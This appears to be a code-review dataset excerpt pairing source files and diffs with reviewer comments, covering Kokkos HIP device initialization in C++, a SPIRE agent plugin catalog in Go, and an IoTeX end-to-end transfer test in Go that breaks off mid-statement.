/* //@HEADER // ************************************************************************ // // Kokkos v. 3.0 // Copyright (2020) National Technology & Engineering // Solutions of Sandia, LLC (NTESS). // // Under the terms of Contract DE-NA0003525 with NTESS, // the U.S. Government retains certain rights in this software. // // Redistribution and use in source and binary forms, with or without // modification, are permitted provided that the following conditions are // met: // // 1. Redistributions of source code must retain the above copyright // notice, this list of conditions and the following disclaimer. // // 2. Redistributions in binary form must reproduce the above copyright // notice, this list of conditions and the following disclaimer in the // documentation and/or other materials provided with the distribution. // // 3. Neither the name of the Corporation nor the names of the // contributors may be used to endorse or promote products derived from // this software without specific prior written permission. // // THIS SOFTWARE IS PROVIDED BY NTESS "AS IS" AND ANY // EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE // IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR // PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL NTESS OR THE // CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, // EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, // PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR // PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF // LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING // NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS // SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. // // Questions? Contact Christian R. Trott ([email protected]) // // ************************************************************************ //@HEADER */ /*--------------------------------------------------------------------------*/ /* Kokkos interfaces */ #include <Kokkos_Core.hpp> #include <HIP/Kokkos_HIP_Instance.hpp> #include <Kokkos_HIP.hpp> #include <Kokkos_HIP_Space.hpp> #include <impl/Kokkos_Error.hpp> /*--------------------------------------------------------------------------*/ /* Standard 'C' libraries */ #include <stdlib.h> /* Standard 'C++' libraries */ #include <iostream> #include <sstream> #include <string> #include <vector> namespace Kokkos { namespace Experimental { namespace { class HIPInternalDevices { public: enum { MAXIMUM_DEVICE_COUNT = 64 }; struct hipDeviceProp_t m_hipProp[MAXIMUM_DEVICE_COUNT]; int m_hipDevCount; HIPInternalDevices(); static HIPInternalDevices const &singleton(); }; HIPInternalDevices::HIPInternalDevices() { HIP_SAFE_CALL(hipGetDeviceCount(&m_hipDevCount)); if (m_hipDevCount > MAXIMUM_DEVICE_COUNT) { Kokkos::abort( "Sorry, you have more GPUs per node than we thought anybody would ever " "have. Please report this to github.com/kokkos/kokkos."); } for (int i = 0; i < m_hipDevCount; ++i) { HIP_SAFE_CALL(hipGetDeviceProperties(m_hipProp + i, i)); } } const HIPInternalDevices &HIPInternalDevices::singleton() { static HIPInternalDevices self; return self; } } // namespace namespace Impl { //---------------------------------------------------------------------------- void HIPInternal::print_configuration(std::ostream &s) const { const HIPInternalDevices &dev_info = HIPInternalDevices::singleton(); s << "macro KOKKOS_ENABLE_HIP : defined" << '\n'; #if defined(HIP_VERSION) s << "macro HIP_VERSION = " << HIP_VERSION << " = version " << HIP_VERSION / 100 << "." << HIP_VERSION % 100 << '\n'; #endif for (int i = 0; i < dev_info.m_hipDevCount; ++i) { s << "Kokkos::Experimental::HIP[ " << i << " ] " << dev_info.m_hipProp[i].name << " version " << (dev_info.m_hipProp[i].major) << "." << dev_info.m_hipProp[i].minor << ", Total Global Memory: " << ::Kokkos::Impl::human_memory_size(dev_info.m_hipProp[i].totalGlobalMem) << ", Shared Memory per Block: " << ::Kokkos::Impl::human_memory_size( dev_info.m_hipProp[i].sharedMemPerBlock); if (m_hipDev == i) s << " : Selected"; s << '\n'; } } //---------------------------------------------------------------------------- HIPInternal::~HIPInternal() { if (m_scratchSpace || m_scratchFlags || m_scratchConcurrentBitset) { std::cerr << "Kokkos::Experimental::HIP ERROR: Failed to call " "Kokkos::Experimental::HIP::finalize()" << std::endl; std::cerr.flush(); } m_hipDev = -1; m_hipArch = -1; m_multiProcCount = 0; m_maxWarpCount = 0; m_maxSharedWords = 0; m_maxShmemPerBlock = 0; m_scratchSpaceCount = 0; m_scratchFlagsCount = 0; m_scratchSpace = nullptr; m_scratchFlags = nullptr; m_scratchConcurrentBitset = nullptr; m_stream = nullptr; } int HIPInternal::verify_is_initialized(const char *const label) const { if (m_hipDev < 0) { std::cerr << "Kokkos::Experimental::HIP::" << label << " : ERROR device not initialized" << std::endl; } return 0 <= m_hipDev; } HIPInternal &HIPInternal::singleton() { static HIPInternal *self = nullptr; if (!self) { self = new HIPInternal(); } return *self; } void HIPInternal::fence() const { HIP_SAFE_CALL(hipStreamSynchronize(m_stream)); // can reset our cycle id now as well m_cycleId = 0; } void HIPInternal::initialize(int hip_device_id, hipStream_t stream) { if (was_finalized) Kokkos::abort("Calling HIP::initialize after HIP::finalize is illegal\n"); if (is_initialized()) return; int constexpr WordSize = sizeof(size_type); if (!HostSpace::execution_space::impl_is_initialized()) { const std::string msg( "HIP::initialize ERROR : HostSpace::execution_space " "is not initialized"); Kokkos::Impl::throw_runtime_exception(msg); } const HIPInternalDevices &dev_info = HIPInternalDevices::singleton(); const bool ok_init = nullptr == m_scratchSpace || nullptr == m_scratchFlags; // Need at least a GPU device const bool ok_id = 0 <= hip_device_id && hip_device_id < dev_info.m_hipDevCount; if (ok_init && ok_id) { const struct hipDeviceProp_t &hipProp = dev_info.m_hipProp[hip_device_id]; m_hipDev = hip_device_id; m_deviceProp = hipProp; HIP_SAFE_CALL(hipSetDevice(m_hipDev)); m_stream = stream; m_team_scratch_current_size = 0; m_team_scratch_ptr = nullptr; // number of multiprocessors m_multiProcCount = hipProp.multiProcessorCount; //---------------------------------- // Maximum number of warps, // at most one warp per thread in a warp for reduction. m_maxWarpCount = hipProp.maxThreadsPerBlock / Impl::HIPTraits::WarpSize; if (HIPTraits::WarpSize < m_maxWarpCount) { m_maxWarpCount = Impl::HIPTraits::WarpSize; } m_maxSharedWords = hipProp.sharedMemPerBlock / WordSize; //---------------------------------- // Maximum number of blocks m_maxBlock = hipProp.maxGridSize[0]; // theoretically, we can get 40 WF's / CU, but only can sustain 32 // see // https://github.com/ROCm-Developer-Tools/HIP/blob/a0b5dfd625d99af7e288629747b40dd057183173/vdi/hip_platform.cpp#L742 m_maxBlocksPerSM = 32; // FIXME_HIP - Nick to implement this upstream // Register count comes from Sec. 2.2. "Data Sharing" of the // Vega 7nm ISA document (see the diagram) // https://developer.amd.com/wp-content/resources/Vega_7nm_Shader_ISA.pdf // VGPRS = 4 (SIMD/CU) * 256 VGPR/SIMD * 64 registers / VGPR = // 65536 VGPR/CU m_regsPerSM = 65536; m_shmemPerSM = hipProp.maxSharedMemoryPerMultiProcessor; m_maxShmemPerBlock = hipProp.sharedMemPerBlock; m_maxThreadsPerSM = m_maxBlocksPerSM * HIPTraits::WarpSize; //---------------------------------- // Multiblock reduction uses scratch flags for counters // and scratch space for partial reduction values. // Allocate some initial space. This will grow as needed. { const unsigned reduce_block_count = m_maxWarpCount * Impl::HIPTraits::WarpSize; (void)scratch_flags(reduce_block_count * 2 * sizeof(size_type)); (void)scratch_space(reduce_block_count * 16 * sizeof(size_type)); } //---------------------------------- // Concurrent bitset for obtaining unique tokens from within // an executing kernel. { const int32_t buffer_bound = Kokkos::Impl::concurrent_bitset::buffer_bound(HIP::concurrency()); // Allocate and initialize uint32_t[ buffer_bound ] using Record = Kokkos::Impl::SharedAllocationRecord<Kokkos::Experimental::HIPSpace, void>; Record *const r = Record::allocate(Kokkos::Experimental::HIPSpace(), "Kokkos::InternalScratchBitset", sizeof(uint32_t) * buffer_bound); Record::increment(r); m_scratchConcurrentBitset = reinterpret_cast<uint32_t *>(r->data()); HIP_SAFE_CALL(hipMemset(m_scratchConcurrentBitset, 0, sizeof(uint32_t) * buffer_bound)); } //---------------------------------- } else { std::ostringstream msg; msg << "Kokkos::Experimental::HIP::initialize(" << hip_device_id << ") FAILED"; if (!ok_init) { msg << " : Already initialized"; } if (!ok_id) { msg << " : Device identifier out of range " << "[0.." << dev_info.m_hipDevCount - 1 << "]"; } Kokkos::Impl::throw_runtime_exception(msg.str()); } // Init the array for used for arbitrarily sized atomics if (m_stream == nullptr) ::Kokkos::Impl::initialize_host_hip_lock_arrays(); } //---------------------------------------------------------------------------- using ScratchGrain = Kokkos::Experimental::HIP::size_type[Impl::HIPTraits::WarpSize]; enum { sizeScratchGrain = sizeof(ScratchGrain) }; Kokkos::Experimental::HIP::size_type *HIPInternal::scratch_space( const Kokkos::Experimental::HIP::size_type size) { if (verify_is_initialized("scratch_space") && m_scratchSpaceCount * sizeScratchGrain < size) { m_scratchSpaceCount = (size + sizeScratchGrain - 1) / sizeScratchGrain; using Record = Kokkos::Impl::SharedAllocationRecord<Kokkos::Experimental::HIPSpace, void>; if (m_scratchSpace) Record::decrement(Record::get_record(m_scratchSpace)); Record *const r = Record::allocate( Kokkos::Experimental::HIPSpace(), "Kokkos::InternalScratchSpace", (sizeScratchGrain * m_scratchSpaceCount)); Record::increment(r); m_scratchSpace = reinterpret_cast<size_type *>(r->data()); } return m_scratchSpace; } Kokkos::Experimental::HIP::size_type *HIPInternal::scratch_flags( const Kokkos::Experimental::HIP::size_type size) { if (verify_is_initialized("scratch_flags") && m_scratchFlagsCount * sizeScratchGrain < size) { m_scratchFlagsCount = (size + sizeScratchGrain - 1) / sizeScratchGrain; using Record = Kokkos::Impl::SharedAllocationRecord<Kokkos::Experimental::HIPSpace, void>; if (m_scratchFlags) Record::decrement(Record::get_record(m_scratchFlags)); Record *const r = Record::allocate( Kokkos::Experimental::HIPSpace(), "Kokkos::InternalScratchFlags", (sizeScratchGrain * m_scratchFlagsCount)); Record::increment(r); m_scratchFlags = reinterpret_cast<size_type *>(r->data()); HIP_SAFE_CALL( hipMemset(m_scratchFlags, 0, m_scratchFlagsCount * sizeScratchGrain)); } return m_scratchFlags; } void *HIPInternal::resize_team_scratch_space(std::int64_t bytes, bool force_shrink) { if (m_team_scratch_current_size == 0) { m_team_scratch_current_size = bytes; m_team_scratch_ptr = Kokkos::kokkos_malloc<Kokkos::Experimental::HIPSpace>( "Kokkos::HIPSpace::TeamScratchMemory", m_team_scratch_current_size); } if ((bytes > m_team_scratch_current_size) || ((bytes < m_team_scratch_current_size) && (force_shrink))) { m_team_scratch_current_size = bytes; m_team_scratch_ptr = Kokkos::kokkos_realloc<Kokkos::Experimental::HIPSpace>( m_team_scratch_ptr, m_team_scratch_current_size); } return m_team_scratch_ptr; } //---------------------------------------------------------------------------- void HIPInternal::finalize() { this->fence(); was_finalized = true; if (nullptr != m_scratchSpace || nullptr != m_scratchFlags) { using RecordHIP = Kokkos::Impl::SharedAllocationRecord<Kokkos::Experimental::HIPSpace>; RecordHIP::decrement(RecordHIP::get_record(m_scratchFlags)); RecordHIP::decrement(RecordHIP::get_record(m_scratchSpace)); RecordHIP::decrement(RecordHIP::get_record(m_scratchConcurrentBitset)); if (m_team_scratch_current_size > 0) Kokkos::kokkos_free<Kokkos::Experimental::HIPSpace>(m_team_scratch_ptr); m_hipDev = -1; m_hipArch = -1; m_multiProcCount = 0; m_maxWarpCount = 0; m_maxBlock = 0; m_maxSharedWords = 0; m_maxShmemPerBlock = 0; m_scratchSpaceCount = 0; m_scratchFlagsCount = 0; m_scratchSpace = nullptr; m_scratchFlags = nullptr; m_scratchConcurrentBitset = nullptr; m_stream = nullptr; m_team_scratch_current_size = 0; m_team_scratch_ptr = nullptr; } if (nullptr != d_driverWorkArray) { HIP_SAFE_CALL(hipHostFree(d_driverWorkArray)); d_driverWorkArray = nullptr; } } char *HIPInternal::get_next_driver(size_t driverTypeSize) const { std::lock_guard<std::mutex> const lock(m_mutexWorkArray); if (d_driverWorkArray == nullptr) { HIP_SAFE_CALL( hipHostMalloc(&d_driverWorkArray, m_maxDriverCycles * m_maxDriverTypeSize * sizeof(char), hipHostMallocNonCoherent)); } if (driverTypeSize > m_maxDriverTypeSize) { // fence handles the cycle id reset for us fence(); HIP_SAFE_CALL(hipHostFree(d_driverWorkArray)); m_maxDriverTypeSize = driverTypeSize; if (m_maxDriverTypeSize % 128 != 0) m_maxDriverTypeSize = m_maxDriverTypeSize + 128 - m_maxDriverTypeSize % 128; HIP_SAFE_CALL( hipHostMalloc(&d_driverWorkArray, m_maxDriverCycles * m_maxDriverTypeSize * sizeof(char), hipHostMallocNonCoherent)); } else { m_cycleId = (m_cycleId + 1) % m_maxDriverCycles; if (m_cycleId == 0) { // ensure any outstanding kernels are completed before we wrap around fence(); } } return &d_driverWorkArray[m_maxDriverTypeSize * m_cycleId]; } //---------------------------------------------------------------------------- Kokkos::Experimental::HIP::size_type hip_internal_multiprocessor_count() { return HIPInternal::singleton().m_multiProcCount; } Kokkos::Experimental::HIP::size_type hip_internal_maximum_warp_count() { return HIPInternal::singleton().m_maxWarpCount; } Kokkos::Experimental::HIP::size_type hip_internal_maximum_grid_count() { return HIPInternal::singleton().m_maxBlock; } Kokkos::Experimental::HIP::size_type *hip_internal_scratch_space( const Kokkos::Experimental::HIP::size_type size) { return HIPInternal::singleton().scratch_space(size); } Kokkos::Experimental::HIP::size_type *hip_internal_scratch_flags( const Kokkos::Experimental::HIP::size_type size) { return HIPInternal::singleton().scratch_flags(size); } } // namespace Impl } // namespace Experimental } // namespace Kokkos //---------------------------------------------------------------------------- namespace Kokkos { namespace Impl { void hip_device_synchronize() { HIP_SAFE_CALL(hipDeviceSynchronize()); } void hip_internal_error_throw(hipError_t e, const char *name, const char *file, const int line) { std::ostringstream out; out << name << " error( " << hipGetErrorName(e) << "): " << hipGetErrorString(e); if (file) { out << " " << file << ":" << line; } throw_runtime_exception(out.str()); } } // namespace Impl } // namespace Kokkos //---------------------------------------------------------------------------- namespace Kokkos { namespace Experimental { HIP::size_type HIP::detect_device_count() { return HIPInternalDevices::singleton().m_hipDevCount; } } // namespace Experimental } // namespace Kokkos
1
28,750
Could you please elaborate on why you need all this magic here? In which cases do you want the same id to be returned? Does this work the same way for all backends?
kokkos-kokkos
cpp
@@ -38,11 +38,8 @@ var ( ) type Config struct { - // Directory in which plugin config files - // reside - ConfigDir string - - Log logrus.FieldLogger + PluginsConfigs map[string]map[string]common.HclPluginConfig + Log logrus.FieldLogger } type catalog struct {
1
package catalog import ( "fmt" "sync" "github.com/sirupsen/logrus" // Plugin interfaces "github.com/spiffe/spire/proto/agent/keymanager" "github.com/spiffe/spire/proto/agent/nodeattestor" "github.com/spiffe/spire/proto/agent/workloadattestor" goplugin "github.com/hashicorp/go-plugin" common "github.com/spiffe/spire/pkg/common/catalog" ) const ( KeyManagerType = "KeyManager" NodeAttestorType = "NodeAttestor" WorkloadAttestorType = "WorkloadAttestor" ) type Catalog interface { common.Catalog KeyManagers() []keymanager.KeyManager NodeAttestors() []nodeattestor.NodeAttestor WorkloadAttestors() []workloadattestor.WorkloadAttestor } var ( supportedPlugins = map[string]goplugin.Plugin{ KeyManagerType: &keymanager.KeyManagerPlugin{}, NodeAttestorType: &nodeattestor.NodeAttestorPlugin{}, WorkloadAttestorType: &workloadattestor.WorkloadAttestorPlugin{}, } ) type Config struct { // Directory in which plugin config files // reside ConfigDir string Log logrus.FieldLogger } type catalog struct { com common.Catalog m *sync.RWMutex keyManagerPlugins []keymanager.KeyManager nodeAttestorPlugins []nodeattestor.NodeAttestor workloadAttestorPlugins []workloadattestor.WorkloadAttestor } func New(c *Config) Catalog { commonConfig := &common.Config{ ConfigDir: c.ConfigDir, SupportedPlugins: supportedPlugins, Log: c.Log, } return &catalog{ com: common.New(commonConfig), m: new(sync.RWMutex), } } func (c *catalog) Run() error { c.m.Lock() defer c.m.Unlock() err := c.com.Run() if err != nil { return err } return c.categorize() } func (c *catalog) Stop() { c.m.Lock() defer c.m.Unlock() c.com.Stop() c.reset() return } func (c *catalog) Reload() error { c.m.Lock() defer c.m.Unlock() err := c.com.Reload() if err != nil { return err } return c.categorize() } func (c *catalog) Plugins() []*common.ManagedPlugin { c.m.RLock() defer c.m.RUnlock() return c.com.Plugins() } func (c *catalog) Find(plugin common.Plugin) *common.ManagedPlugin { c.m.RLock() defer c.m.RUnlock() return c.com.Find(plugin) } func (c *catalog) KeyManagers() []keymanager.KeyManager { c.m.RLock() defer c.m.RUnlock() return c.keyManagerPlugins } func (c *catalog) NodeAttestors() []nodeattestor.NodeAttestor { c.m.RLock() defer c.m.RUnlock() return c.nodeAttestorPlugins } func (c *catalog) WorkloadAttestors() []workloadattestor.WorkloadAttestor { c.m.RLock() defer c.m.RUnlock() return c.workloadAttestorPlugins } // categorize iterates over all managed plugins and casts them into their // respective client types. This method is called during Run and Reload // to prevent the consumer from having to check for errors when fetching // a client from the catalog func (c *catalog) categorize() error { c.reset() errMsg := "Plugin %s does not adhere to %s interface" for _, p := range c.com.Plugins() { switch p.Config.PluginType { case KeyManagerType: pl, ok := p.Plugin.(keymanager.KeyManager) if !ok { return fmt.Errorf(errMsg, p.Config.PluginName, KeyManagerType) } c.keyManagerPlugins = append(c.keyManagerPlugins, pl) case NodeAttestorType: pl, ok := p.Plugin.(nodeattestor.NodeAttestor) if !ok { return fmt.Errorf(errMsg, p.Config.PluginName, NodeAttestorType) } c.nodeAttestorPlugins = append(c.nodeAttestorPlugins, pl) case WorkloadAttestorType: pl, ok := p.Plugin.(workloadattestor.WorkloadAttestor) if !ok { return fmt.Errorf(errMsg, p.Config.PluginName, WorkloadAttestorType) } c.workloadAttestorPlugins = append(c.workloadAttestorPlugins, pl) default: return fmt.Errorf("Unsupported plugin type %s", p.Config.PluginType) } } // Guarantee we have at least one of each type pluginCount := map[string]int{} pluginCount[KeyManagerType] = len(c.keyManagerPlugins) pluginCount[NodeAttestorType] = len(c.nodeAttestorPlugins) pluginCount[WorkloadAttestorType] = len(c.workloadAttestorPlugins) for t, c := range pluginCount { if c < 1 { return fmt.Errorf("At least one plugin of type %s is required", t) } } return nil } func (c *catalog) reset() { c.keyManagerPlugins = nil c.nodeAttestorPlugins = nil c.workloadAttestorPlugins = nil }
1
9,033
nit: `PluginConfigs` feels a little better
spiffe-spire
go
@@ -323,7 +323,7 @@ func TestLocalTransfer(t *testing.T) { probeSvr := probe.New(7788) require.NoError(probeSvr.Start(ctx)) defer func() { - require.NoError(probeSvr.Stop(ctx)) + probeSvr.Stop(ctx) }() // Start server
1
// Copyright (c) 2019 IoTeX Foundation // This is an alpha (internal) release and is not suitable for production. This source code is provided 'as is' and no // warranties are given as to title or non-infringement, merchantability or fitness for purpose and, to the extent // permitted by law, all liability for your use of the code is disclaimed. This source code is governed by Apache // License 2.0 that can be found in the LICENSE file. package e2etest import ( "context" "fmt" "math/big" "math/rand" "testing" "time" "github.com/cenkalti/backoff" "github.com/stretchr/testify/require" "google.golang.org/grpc" "github.com/iotexproject/go-pkgs/crypto" "github.com/iotexproject/iotex-address/address" "github.com/iotexproject/iotex-proto/golang/iotexapi" "github.com/iotexproject/iotex-core/action" accountutil "github.com/iotexproject/iotex-core/action/protocol/account/util" "github.com/iotexproject/iotex-core/blockchain" "github.com/iotexproject/iotex-core/config" "github.com/iotexproject/iotex-core/pkg/probe" "github.com/iotexproject/iotex-core/server/itx" "github.com/iotexproject/iotex-core/state/factory" "github.com/iotexproject/iotex-core/test/identityset" "github.com/iotexproject/iotex-core/testutil" ) type TransferState int const ( //This transfer should fail to be accepted into action pool TsfFail TransferState = iota //This transfer should be accepted into action pool, //and later on be minted into block chain after block creating interval TsfSuccess //This transfer should be accepted into action pool, //but will stay in action pool (not minted yet) //until all the blocks with preceding nonce arrive TsfPending //This transfer should enable all the pending transfer in action pool be accepted //into block chain. This happens when a transfer with the missing nonce arrives, //filling the gap between minted blocks and pending blocks. TsfFinal ) type AccountState int const ( //This account should be created on blockchain in run time with the given balance AcntCreate AccountState = iota //This account already exist, need to load the the key, address, balance to this test case AcntExist //This account doesnt exist on blockchain, but have a valid key and address AcntNotRegistered //This account doesnt exist, the address is not valid (a random byte string) AcntBadAddr ) type simpleTransferTestCfg struct { senderAcntState AccountState senderPriKey crypto.PrivateKey senderBalance *big.Int recvAcntState AccountState recvPriKey crypto.PrivateKey recvBalance *big.Int nonce uint64 amount *big.Int payload []byte gasLimit uint64 gasPrice *big.Int expectedResult TransferState message string } var ( localKeys = []string{ "fd26207d4657c422da8242686ba4f5066be11ffe9d342d37967f9538c44cebbf", "012d7c684388ca7508fb3483f58e29a8de327b28097dd1d207116225307c98bf", "0a653365c521592062fbbd3b8e1fc64a80b6199bce2b1dbac091955b5fe14125", "0b3eb204a1641ea072505eec5161043e8c19bd039fad7f61e2180d4d396af45b", "affad54ae2fd6f139c235439bebb9810ccdd016911113b220af6fd87c952b5bd", "d260035a571390213c8521b73fff47b6fd8ce2474e37a2421bf1d4657e06e3ea", "dee8d3dab8fbf36990608936241d1cc6f7d51663285919806eb05b1365dd62a3", "d08769fb91911eed6156b1ea7dbb8adf3a68b1ed3b4b173074e7a67996d76c5d", "29945a86884def518347585caaddcc9ac08c5d6ca614b8547625541b43adffe7", "c8018d8a2ed602831c3435b03e33669d0f59e29c939764f1b11591175f2fe615", } // In the test case: // - an account with "nil" private key will be created with // keys, address, and initialized with the given balance. // - an account with exiting private key will load exiting // balance into test case. getSimpleTransferTests = []simpleTransferTestCfg{ { AcntCreate, nil, big.NewInt(1000000), AcntCreate, nil, big.NewInt(1000000), 1, big.NewInt(100), // nonce, amount make([]byte, 100), //payload uint64(200000), big.NewInt(1), // gasLimit, gasPrice TsfSuccess, "Normal transfer from an account with enough balance and gas", }, { AcntCreate, nil, big.NewInt(232222), AcntCreate, nil, big.NewInt(100000), 1, big.NewInt(222222), make([]byte, 0), uint64(200000), big.NewInt(1), TsfSuccess, "Transfer with just enough balance", }, { AcntCreate, nil, big.NewInt(1000000), AcntNotRegistered, nil, big.NewInt(1000000), 1, big.NewInt(100), // nonce, amount make([]byte, 100), //payload uint64(200000), big.NewInt(1), // gasLimit, gasPrice TsfSuccess, "Normal transfer to an address not created on block chain", }, { AcntCreate, nil, big.NewInt(100000), AcntCreate, nil, big.NewInt(100000), 1, big.NewInt(0), make([]byte, 4), uint64(200000), big.NewInt(1), TsfSuccess, "Transfer with 0 amount", }, { AcntExist, identityset.PrivateKey(0), big.NewInt(100000), AcntCreate, nil, big.NewInt(100000), 1, big.NewInt(100), make([]byte, 4), uint64(200000), big.NewInt(1), TsfSuccess, "Transfer with same nonce from a single sender 1", }, { AcntExist, identityset.PrivateKey(1), big.NewInt(100000), AcntCreate, nil, big.NewInt(100000), 2, big.NewInt(100), make([]byte, 4), uint64(200000), big.NewInt(1), TsfPending, "Transfer with a sequence of nonce from a single sender 1", }, { AcntExist, identityset.PrivateKey(1), big.NewInt(100000), AcntCreate, nil, big.NewInt(100000), 3, big.NewInt(100), make([]byte, 4), uint64(200000), big.NewInt(1), TsfPending, "Transfer with a sequence of nonce from a single sender 2", }, { AcntExist, getLocalKey(0), big.NewInt(30000), AcntCreate, nil, big.NewInt(100000), 2, big.NewInt(20000), make([]byte, 0), uint64(200000), big.NewInt(0), TsfPending, "Transfer to multiple accounts with not enough total balance 1", }, { AcntExist, getLocalKey(0), big.NewInt(30000), AcntCreate, nil, big.NewInt(100000), 3, big.NewInt(20000), make([]byte, 4), uint64(200000), big.NewInt(0), TsfPending, "Transfer to multiple accounts with not enough total balance 2", }, { AcntCreate, nil, big.NewInt(1000000), AcntBadAddr, nil, big.NewInt(1000000), 1, big.NewInt(100), // nonce, amount make([]byte, 100), //payload uint64(200000), big.NewInt(1), // gasLimit, gasPrice TsfFail, "Normal transfer to a bad address", }, /* { AcntNotRegistered, nil, big.NewInt(1000000), AcntCreate, nil, big.NewInt(1000000), 1, big.NewInt(100), // nonce, amount make([]byte, 100), //payload uint64(200000), big.NewInt(1), // gasLimit, gasPrice TsfFail, "Normal transfer from an address not created on block chain", }, { AcntCreate, nil, big.NewInt(232221), AcntCreate, nil, big.NewInt(100000), 1, big.NewInt(222222), make([]byte, 0), uint64(200000), big.NewInt(1), TsfFail, "Transfer with not enough balance", }, { AcntCreate, nil, big.NewInt(232222), AcntCreate, nil, big.NewInt(100000), 1, big.NewInt(222222), make([]byte, 4), uint64(200000), big.NewInt(1), TsfFail, "Transfer with not enough balance with payload", }, */ { AcntCreate, nil, big.NewInt(100000), AcntCreate, nil, big.NewInt(100000), 1, big.NewInt(-100), make([]byte, 4), uint64(200000), big.NewInt(1), TsfFail, "Transfer with negative amount", }, { AcntCreate, nil, big.NewInt(1000000), AcntCreate, nil, big.NewInt(1000000), 1, big.NewInt(100), make([]byte, 0), uint64(1000), big.NewInt(1), TsfFail, "Transfer with not enough gas limit", }, { AcntCreate, nil, big.NewInt(100000), AcntCreate, nil, big.NewInt(100000), 0, big.NewInt(0), make([]byte, 4), uint64(200000), big.NewInt(1), TsfFail, "Transfer with nonce 0", }, { AcntExist, identityset.PrivateKey(0), big.NewInt(100000), AcntCreate, nil, big.NewInt(100000), 1, big.NewInt(100), make([]byte, 4), uint64(200000), big.NewInt(1), TsfFail, "Transfer with same nonce from a single sender 2", }, { AcntExist, identityset.PrivateKey(1), big.NewInt(100000), AcntCreate, nil, big.NewInt(100000), 1, big.NewInt(100), make([]byte, 4), uint64(200000), big.NewInt(1), TsfFinal, "Transfer with a sequence of nonce from a single sender 3", }, { AcntExist, getLocalKey(0), big.NewInt(30000), AcntCreate, nil, big.NewInt(100000), 1, big.NewInt(20000), make([]byte, 4), uint64(200000), big.NewInt(0), TsfFinal, "Transfer to multiple accounts with not enough total balance 3", }, } ) func TestLocalTransfer(t *testing.T) { require := require.New(t) testTriePath, err := testutil.PathOfTempFile("trie") require.NoError(err) testDBPath, err := testutil.PathOfTempFile("db") require.NoError(err) testIndexPath, err := testutil.PathOfTempFile("index") require.NoError(err) testBloomfilterIndexPath, err := testutil.PathOfTempFile("bloomfilterIndex") require.NoError(err) testSystemLogPath, err := testutil.PathOfTempFile("systemlog") require.NoError(err) testCandidateIndexPath, err := testutil.PathOfTempFile("candidateIndex") require.NoError(err) defer func() { testutil.CleanupPath(t, testTriePath) testutil.CleanupPath(t, testDBPath) testutil.CleanupPath(t, testIndexPath) testutil.CleanupPath(t, testSystemLogPath) testutil.CleanupPath(t, testBloomfilterIndexPath) testutil.CleanupPath(t, testCandidateIndexPath) }() networkPort := 4689 apiPort := testutil.RandomPort() cfg, err := newTransferConfig(testDBPath, testTriePath, testIndexPath, testBloomfilterIndexPath, testSystemLogPath, testCandidateIndexPath, networkPort, apiPort) defer func() { delete(cfg.Plugins, config.GatewayPlugin) }() require.NoError(err) for i, tsfTest := range getSimpleTransferTests { if tsfTest.senderAcntState == AcntCreate { sk, err := crypto.GenerateKey() require.NoError(err) addr, err := address.FromBytes(sk.PublicKey().Hash()) require.NoError(err) cfg.Genesis.InitBalanceMap[addr.String()] = tsfTest.senderBalance.String() getSimpleTransferTests[i].senderPriKey = sk } if tsfTest.recvAcntState == AcntCreate { sk, err := crypto.GenerateKey() require.NoError(err) addr, err := address.FromBytes(sk.PublicKey().Hash()) require.NoError(err) cfg.Genesis.InitBalanceMap[addr.String()] = tsfTest.recvBalance.String() getSimpleTransferTests[i].recvPriKey = sk } } for i := 0; i < len(localKeys); i++ { sk := getLocalKey(i) addr, err := address.FromBytes(sk.PublicKey().Hash()) require.NoError(err) cfg.Genesis.InitBalanceMap[addr.String()] = "30000" } // create server svr, err := itx.NewServer(cfg) require.NoError(err) // Create and start probe server ctx := context.Background() probeSvr := probe.New(7788) require.NoError(probeSvr.Start(ctx)) defer func() { require.NoError(probeSvr.Stop(ctx)) }() // Start server ctx, stopServer := context.WithCancel(ctx) defer stopServer() go itx.StartServer(ctx, svr, probeSvr, cfg) // target address for grpc connection. Default is "127.0.0.1:14014" grpcAddr := fmt.Sprintf("127.0.0.1:%d", apiPort) grpcctx, cancel := context.WithTimeout(context.Background(), 2*time.Second) defer cancel() conn, err := grpc.DialContext(grpcctx, grpcAddr, grpc.WithBlock(), grpc.WithInsecure()) require.NoError(err) defer conn.Close() client := iotexapi.NewAPIServiceClient(conn) chainID := cfg.Chain.ID bc := svr.ChainService(chainID).Blockchain() sf := svr.ChainService(chainID).StateFactory() ap := svr.ChainService(chainID).ActionPool() as := svr.ChainService(chainID).APIServer() for _, tsfTest := range getSimpleTransferTests { senderPriKey, senderAddr, err := initStateKeyAddr(tsfTest.senderAcntState, tsfTest.senderPriKey, tsfTest.senderBalance, bc, sf) require.NoError(err, tsfTest.message) _, recvAddr, err := initStateKeyAddr(tsfTest.recvAcntState, tsfTest.recvPriKey, tsfTest.recvBalance, bc, sf) require.NoError(err, tsfTest.message) tsf, err := testutil.SignedTransfer(recvAddr, senderPriKey, tsfTest.nonce, tsfTest.amount, tsfTest.payload, tsfTest.gasLimit, tsfTest.gasPrice) require.NoError(err, tsfTest.message) // wait 2 block time, retry 5 times retryInterval := cfg.Genesis.BlockInterval * 2 / 5 bo := backoff.WithMaxRetries(backoff.NewConstantBackOff(retryInterval), 5) err = backoff.Retry(func() error { _, err := client.SendAction(context.Background(), &iotexapi.SendActionRequest{Action: tsf.Proto()}) return err }, bo) switch tsfTest.expectedResult { case TsfSuccess: require.NoError(err, tsfTest.message) // Wait long enough for a block to be minted, and check the balance of both // sender and receiver. var selp action.SealedEnvelope err := backoff.Retry(func() error { var err error selp, err = as.GetActionByActionHash(tsf.Hash()) return err }, bo) require.NoError(err, tsfTest.message) require.Equal(tsfTest.nonce, selp.Proto().GetCore().GetNonce(), tsfTest.message) require.Equal(senderPriKey.PublicKey().Bytes(), selp.Proto().SenderPubKey, tsfTest.message) newSenderState, _ := accountutil.AccountState(sf, senderAddr) minusAmount := 